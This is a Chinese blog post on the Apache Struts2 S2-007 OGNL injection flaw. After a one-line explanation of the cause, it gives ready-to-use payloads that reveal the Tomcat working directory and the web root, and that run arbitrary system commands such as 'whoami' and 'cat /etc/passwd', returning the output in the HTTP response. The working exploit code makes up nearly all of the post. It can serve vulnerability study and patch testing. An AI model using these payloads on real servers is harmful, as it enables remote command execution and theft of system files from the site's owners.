zoukankan      html  css  js  c++  java
  • S2-007 远程代码执行漏洞检测与利用

    漏洞原理

    如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。

    POC

    a.获取tomcat执行路径:

    %{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

    b、获取web路径

    %{
    #req=@org.apache.struts2.ServletActionContext@getRequest(),
    #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
    #response.println(#req.getRealPath('/')),
    #response.flush(),
    #response.close()
    }

    c、执行任意命令:

    %{
    #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
    #b=#a.getInputStream(),
    #c=new java.io.InputStreamReader(#b),
    #d=new java.io.BufferedReader(#c),
    #e=new char[50000],
    #d.read(#e),
    #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
    #f.getWriter().println(new java.lang.String(#e)),
    #f.getWriter().flush(),#f.getWriter().close()
    }

    执行任意命令时,如果所执行的命令需要组合,则将上述 payload 改为:

    %{
    #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
    #b=#a.getInputStream(),
    #c=new java.io.InputStreamReader(#b),
    #d=new java.io.BufferedReader(#c),
    #e=new char[50000],
    #d.read(#e),
    #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
    #f.getWriter().println(new java.lang.String(#e)),
    #f.getWriter().flush(),#f.getWriter().close()
    }

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    【Networking】(转)一个非常好的epoll+线程池服务器Demo
    【算法】Logistic regression (逻辑回归) 概述
    【Linux】/dev/null 2>&1 详解
    单点登录与联合登录
    web项目报outmemory错误解决方案
    hadoop学习之HDFS
    ELK日志分析系统
    基于cookie共享的SSO中的遇到的问题
    oracle的隐式游标
    mysql截取字符串与reverse函数
  • 原文地址:https://www.cnblogs.com/devi1/p/13486632.html
Copyright © 2011-2022 走看看